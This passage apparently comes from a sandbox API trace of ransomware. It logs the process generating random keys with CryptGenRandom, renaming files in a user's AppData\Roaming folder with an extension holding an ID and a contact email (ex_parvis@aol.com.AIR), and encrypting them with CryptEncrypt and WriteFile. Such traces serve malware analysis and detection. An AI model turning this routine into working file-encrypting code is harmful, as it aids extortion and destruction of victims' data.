	[0105.787] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.787] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.788] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.788] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.789] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x13815, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x13815, lpOverlapped=0x0) returned 1
	[0105.791] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.791] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.791] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv", dwFileAttributes=0x80) returned 1
	[0105.791] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv") returned 71
	[0105.791] GetProcessHeap () returned 0x540000
	[0105.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf4) returned 0x56f050
	[0105.791] lstrcpyW (in: lpString1=0x56f050, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv"
	[0105.791] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.792] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tfyc_hdr9nrjn24ro4ft.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tfyc_hdr9nrjn24ro4ft.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.795] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tfyC_hdr9nRJn24ro4Ft.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tfyc_hdr9nrjn24ro4ft.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.795] GetProcessHeap () returned 0x540000
	[0105.795] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56f050 | out: hHeap=0x540000) returned 1
	[0105.795] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=27059) returned 1
	[0105.795] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x69b3
	[0105.795] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.795] GetProcessHeap () returned 0x540000
	[0105.795] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.795] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.797] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.798] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.798] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.798] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x69b3, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x69b3, lpOverlapped=0x0) returned 1
	[0105.799] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.799] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.799] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png", dwFileAttributes=0x80) returned 1
	[0105.800] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png") returned 61
	[0105.800] GetProcessHeap () returned 0x540000
	[0105.800] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x603bd0
	[0105.800] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png"
	[0105.800] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.800] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\szs27qox-t.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\szs27qox-t.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.803] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\szS27QOX-t.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\szs27qox-t.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.803] GetProcessHeap () returned 0x540000
	[0105.803] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.803] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=100844) returned 1
	[0105.803] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x189ec
	[0105.803] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.803] GetProcessHeap () returned 0x540000
	[0105.803] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.803] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.803] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.804] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.804] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.805] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x189ec, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x189ec, lpOverlapped=0x0) returned 1
	[0105.807] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.807] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.807] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf", dwFileAttributes=0x80) returned 1
	[0105.808] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf") returned 55
	[0105.808] GetProcessHeap () returned 0x540000
	[0105.808] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x601bd0
	[0105.808] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf"
	[0105.808] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.808] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\suhn.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\suhn.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.812] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Suhn.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\suhn.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.812] GetProcessHeap () returned 0x540000
	[0105.812] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0105.812] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=19758) returned 1
	[0105.812] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x4d2e
	[0105.812] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.812] GetProcessHeap () returned 0x540000
	[0105.812] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.812] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.814] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.815] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.815] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.815] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x4d2e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x4d2e, lpOverlapped=0x0) returned 1
	[0105.816] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.816] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.816] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a", dwFileAttributes=0x80) returned 1
	[0105.816] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a") returned 57
	[0105.816] GetProcessHeap () returned 0x540000
	[0105.816] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x601bd0
	[0105.816] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a"
	[0105.816] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.816] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sqhwet.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sqhwet.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.821] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SQhWEt.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sqhwet.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.821] GetProcessHeap () returned 0x540000
	[0105.821] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0105.821] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=29523) returned 1
	[0105.821] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7353
	[0105.821] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.821] GetProcessHeap () returned 0x540000
	[0105.821] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.821] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.821] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.822] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.822] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.822] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x7353, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x7353, lpOverlapped=0x0) returned 1
	[0105.823] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.823] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.823] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a", dwFileAttributes=0x80) returned 1
	[0105.824] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a") returned 67
	[0105.824] GetProcessHeap () returned 0x540000
	[0105.824] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xec) returned 0x56efb8
	[0105.824] lstrcpyW (in: lpString1=0x56efb8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a"
	[0105.824] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.824] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rxliu4lilo_c5145.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rxliu4lilo_c5145.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.826] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rxlIU4LilO_c5145.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rxliu4lilo_c5145.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.826] GetProcessHeap () returned 0x540000
	[0105.826] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56efb8 | out: hHeap=0x540000) returned 1
	[0105.826] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=36665) returned 1
	[0105.826] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8f39
	[0105.826] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.826] GetProcessHeap () returned 0x540000
	[0105.826] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.827] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.827] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.828] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.828] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.828] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x8f39, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x8f39, lpOverlapped=0x0) returned 1
	[0105.829] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.829] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.829] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif", dwFileAttributes=0x80) returned 1
	[0105.829] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif") returned 69
	[0105.829] GetProcessHeap () returned 0x540000
	[0105.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf0) returned 0x56efb8
	[0105.829] lstrcpyW (in: lpString1=0x56efb8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pl9elQOfCmP 8cR56s.gif"
